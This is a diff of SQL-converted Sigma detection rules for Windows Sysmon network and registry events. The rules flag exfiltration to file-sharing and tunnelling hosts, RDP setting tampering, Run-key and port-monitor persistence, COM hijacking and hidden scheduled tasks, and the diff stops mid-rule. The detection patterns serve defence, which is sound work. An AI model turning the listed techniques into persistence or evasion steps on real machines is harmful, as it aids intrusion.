"attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - 
"filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' 
OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": 
"1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", 
- "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' 
ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR 
DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Script Initiated Connection", - "id": 
"08249dc0-a28d-4555-8ba5-9255a198e08c", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate scripts" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious 
folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' 
OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may use port monitors to 
run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Hide Schedule Task Via 
Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate Addin Installation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE 